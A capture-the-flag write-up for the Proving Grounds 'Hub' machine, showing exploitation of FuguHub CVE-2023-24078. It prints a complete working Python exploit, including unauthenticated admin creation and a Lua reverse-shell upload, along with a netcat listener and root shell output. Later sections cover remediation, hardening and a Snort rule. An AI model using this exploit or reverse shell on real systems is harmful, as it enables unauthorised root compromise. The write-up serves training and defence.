Box Overview
Hub is a Linux machine from Offensive Security’s Proving Grounds featuring FuguHub - a web-based file server with an unauthenticated remote code execution vulnerability. This box demonstrates the importance of patching known CVEs and proper authentication mechanisms.
Enumeration
Nmap Scan
sudo nmap -sS -sC -A 192.168.229.25 -T4 -oN first.scan
Open Ports:
- 22/tcp - SSH (OpenSSH 8.4p1 Debian)
- 80/tcp - HTTP (nginx 1.18.0) - 403 Forbidden
- 8082/tcp - HTTP (Barracuda Embedded Web Server) - FuguHub
- 9999/tcp - HTTPS (Barracuda Embedded Web Server) - FuguHub SSL
Service Analysis
Port 8082 - FuguHub
Interesting findings:
- WebDAV enabled
- Risky HTTP methods allowed:
PROPFIND,PATCH,PUT,COPY,DELETE,MOVE,MKCOL,PROPPATCH,LOCK,UNLOCK - Admin account setup page accessible without authentication
Initial Reconnaissance
Accessing http://192.168.229.25:8082 presents an admin account setup page - no existing authentication required! 🚨
This allows arbitrary admin account creation.
Vulnerability Research
CVE Discovery
Searched for FuguHub exploits:
searchsploit fuguhub
Found: CVE-2023-24078 - FuguHub 8.1 Remote Code Execution
Vulnerability: Unauthenticated admin account creation + arbitrary file upload = RCE
Exploitation
Exploit Analysis
Exploit capabilities:
- Creates admin account if none exists
- Authenticates with created/provided credentials
- Uploads Lua reverse shell via WebDAV
- Triggers shell execution
Exploit Modification
Issue: Original exploit hardcoded port 443 instead of default 8082
Modified Exploit Code
# Exploit Title: FuguHub 8.1 - Remote Code Execution
# Date: 6/24/2023
# Exploit Author: redfire359
# CVE: CVE-2023-24078
import requests
from bs4 import BeautifulSoup
import hashlib
from random import randint
from urllib3 import encode_multipart_formdata
from urllib3.exceptions import InsecureRequestWarning
import argparse
from colorama import Fore
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# Default credentials for admin creation
username = 'admin'
password = 'password'
email = '[email protected]'
parser = argparse.ArgumentParser()
parser.add_argument("-r","--rhost", help="Victims ip/url", required=True)
parser.add_argument("-rp","--rport", help="http port [Default 80]")
parser.add_argument("-l","--lhost", help="Your IP", required=True)
parser.add_argument("-p","--lport", help="Port for listener", required=True)
args = parser.parse_args()
LHOST = args.lhost
LPORT = args.lport
url = args.rhost
port = args.rport if args.rport else 80
def checkAccount():
print(f"{Fore.YELLOW}[*]{Fore.WHITE} Checking for admin user...")
s = requests.Session()
r = s.get(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp")
soup = BeautifulSoup(r.content, 'html.parser')
search = soup.find('h1')
if r.status_code == 404:
print(f"{Fore.RED}[!]{Fore.WHITE} Page not found!")
exit(0)
userExists = False
for i in search:
if i.string == 'User database already saved':
userExists = True
if userExists:
print(f"{Fore.GREEN}[+]{Fore.WHITE} Admin user exists")
login(r,s)
else:
print(f"{Fore.GREEN}[+]{Fore.WHITE} Creating account: {username}:{password}")
createUser(r,s)
login(r,s)
def createUser(r,s):
data = {
'email': email,
'user': username,
'password': password,
'recoverpassword': 'on'
}
r = s.post(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp", data=data)
print(f"{Fore.GREEN}[+]{Fore.WHITE} User Created!")
def login(r,s):
print(f"{Fore.GREEN}[+]{Fore.WHITE} Logging in...")
data = {'ba_username': username, 'ba_password': password}
r = s.post(f"http://{url}:8082/rtl/protected/wfslinks.lsp", data=data, verify=False)
soup = BeautifulSoup(r.content, 'html.parser')
search = soup.find('title')
for i in search:
if i != 'Web-File-Server':
print(f"{Fore.RED}[!]{Fore.WHITE} Login failed!")
exit(0)
print(f"{Fore.GREEN}[+]{Fore.WHITE} Success! Finding file server...")
exploit(r,s)
def exploit(r,s):
r = s.get(f"http://{url}:8082/fs/")
if r.status_code == 404:
print(f"{Fore.RED}[!]{Fore.WHITE} File server not found")
exit(0)
print(f"{Fore.GREEN}[+]{Fore.WHITE} Code: {r.status_code}, uploading rev shell")
# Lua reverse shell payload
shell = f'''local host, port = "{LHOST}", {LPORT}
local socket = require("socket")
local tcp = socket.tcp()
local io = require("io")
tcp:connect(host, port);
while true do
local cmd, status, partial = tcp:receive()
local f = io.popen(cmd, "r")
local s = f:read("*a")
f:close()
tcp:send(s)
if status == "closed" then break end
end
tcp:close()'''
file_content = f'''<h2>Check your nc listener</h2>
<?lsp if request:method() == "GET" then ?>
<?lsp
{shell}
?>
<?lsp else ?>
Wrong request method!
<?lsp end ?>'''
files = {'file': ('rev.lsp', file_content, 'application/octet-stream')}
r = s.post(f"http://{url}:8082/fs/", files=files)
if r.text == 'ok':
print(f"{Fore.GREEN}[+]{Fore.WHITE} Successfully uploaded, calling shell")
r = s.get(f"http://{url}:8082/rev.lsp")
if __name__=='__main__':
try:
checkAccount()
except Exception as error:
print(error)
Key modifications:
- Changed all hardcoded
443to8082 - Fixed port parameter handling
- Cleaned up formatting
Execution
Setup Listener
nc -nlvp 80
Run Exploit
python3 exploit.py -r 192.168.229.25 -rp 8082 -l 192.168.45.222 -p 80
Output:
[*] Checking for admin user...
[+] No admin user exists yet, creating account with admin:password
[+] User Created!
[+] Logging in...
[+] Success! Finding a valid file server link...
[+] Code: 200, found valid file server, uploading rev shell
[+] Successfully uploaded, calling shell
Shell Received
nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.222] from (UNKNOWN) [192.168.229.25] 49398
Root shell obtained immediately! 🎯
id
# uid=0(root) gid=0(root) groups=0(root)
pwd
# /var/www/html
cat /root/proof.txt
# ec687919675fdff574946925e2dafba9
Root flag captured - Box pwned! ✅
Attack Chain Summary
- Port Scanning → Identified FuguHub on port 8082
- Service Enumeration → Found WebDAV with dangerous methods enabled
- Vulnerability Research → Located CVE-2023-24078 RCE exploit
- Exploit Modification → Fixed port configuration in exploit code
- Admin Creation → Created unauthenticated admin account
- File Upload → Uploaded Lua reverse shell via WebDAV
- Root Shell → FuguHub runs as root - instant root access!
Vulnerability Analysis
CVE-2023-24078 Details
Vulnerability Type: Unauthenticated Remote Code Execution
Affected Versions: FuguHub 8.1 and earlier
Root Cause Chain:
1. Unauthenticated Admin Creation
/Config-Wizard/wizard/SetAdmin.lsp
- No authentication required to access setup wizard
- Allows arbitrary admin account creation
- No rate limiting or CAPTCHA
2. WebDAV File Upload
- Authenticated users can upload arbitrary files
- No file type restrictions
- No content validation
3. Code Execution via LSP
.lspfiles are Lua Server Pages- Server-side Lua code execution
- Uploaded files immediately accessible and executable
4. Root Privileges
- FuguHub service runs as root
- No privilege separation
- Code execution = instant root access
Why This Vulnerability is Critical
CVSS Score: 9.8 (Critical)
Impact:
- Confidentiality: Complete (all data accessible)
- Integrity: Complete (all data modifiable)
- Availability: Complete (system can be taken offline)
Exploitability:
- Network accessible
- No authentication required
- Low complexity
- No user interaction needed
Remediation
Immediate Actions
- Update FuguHub to latest patched version
- Remove setup wizard after initial configuration
- Change default credentials immediately
- Disable WebDAV if not required
Configuration Hardening
Authentication
# Disable setup wizard after first use
rm -rf /Config-Wizard/
# Enforce strong passwords
# Implement account lockout policies
# Enable 2FA if available
Service Hardening
# Run FuguHub as non-root user
useradd -r -s /bin/false fuguhub
chown -R fuguhub:fuguhub /opt/fuguhub
# Update systemd service
[Service]
User=fuguhub
Group=fuguhub
File Upload Restrictions
- Whitelist allowed file extensions
- Validate file contents
- Implement file size limits
- Store uploads outside web root
- Disable script execution in upload directories
WebDAV Configuration
# Disable dangerous methods
<Location /fs/>
<Limit PUT DELETE MOVE COPY MKCOL>
Require valid-user
# Or deny completely if not needed
</Limit>
</Location>
Monitoring & Detection
Log Analysis
Monitor for:
/Config-Wizard/access after initial setup- Multiple admin account creations
.lspfile uploads- WebDAV PUT/DELETE operations
Network Detection
# Snort/Suricata rule example
alert http any any -> any 8082 (
msg:"Possible FuguHub CVE-2023-24078 Exploit";
flow:to_server,established;
content:"/Config-Wizard/wizard/SetAdmin.lsp";
http_uri;
classtype:web-application-attack;
sid:1000001;
)
Technical Deep Dive
Lua Reverse Shell Analysis
local host, port = "ATTACKER_IP", ATTACKER_PORT
local socket = require("socket")
local tcp = socket.tcp()
local io = require("io")
-- Connect to attacker
tcp:connect(host, port);
-- Command loop
while true do
-- Receive command
local cmd, status, partial = tcp:receive()
-- Execute via shell
local f = io.popen(cmd, "r")
local s = f:read("*a")
f:close()
-- Send output back
tcp:send(s)
-- Handle disconnection
if status == "closed" then break end
end
tcp:close()
Why Lua?
- Native to FuguHub/Barracuda server
- No compilation needed
- Full system access via
io.popen() - Socket library available
WebDAV Exploitation
Dangerous Methods Enabled:
PUT- Upload filesDELETE- Remove filesMOVE- Rename/move filesMKCOL- Create directoriesPROPFIND- Enumerate directory structurePROPPATCH- Modify properties
These methods combined with no authentication = full filesystem control.
Tools Used
- nmap
- Python 3
- BeautifulSoup4
- requests
- colorama
- netcat
Credits
Exploit Author: redfire359
CVE: CVE-2023-24078
Box Creator: Offensive Security
Platform: Proving Grounds Practice
“When a setup wizard is still accessible in production, you’re in for a good time!”